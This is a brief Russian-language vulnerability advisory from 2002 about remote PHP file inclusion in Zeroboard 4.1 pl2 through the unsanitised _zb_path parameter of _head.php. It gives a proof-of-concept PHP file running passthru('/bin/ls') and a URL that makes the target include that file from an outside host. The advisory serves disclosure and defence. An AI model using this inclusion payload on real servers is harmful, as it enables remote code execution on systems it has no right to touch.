Security Lab

Выполнение произвольного PHP кода в Zeroboard

Дата публикации:18.06.2002
Всего просмотров:1964
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: Zeroboard – PHP доска объявлений для LINUX и UNIX платформ.

Уязвимость позволяет включать произвольные PHP файлы. Файл _head.php не достаточно санирует входящие параметры. Если в php.ini установлены переменные "allow_url_fopen" и "register_globals" в значение “on”, можно включить произвольные PHP файлы из удаленного URL через сценарий _head.php. Пример:

PHP Source file a.php 
<? passthru("/bin/ls"); ?> 

Accessing URL on vulnerable system: 
http://vulnerablesystem/_head.php?_zb_path=http://example.com/a
уязвимость обнаружена в Zeroboard 4.1 pl2
Ссылки: malicious PHP source injection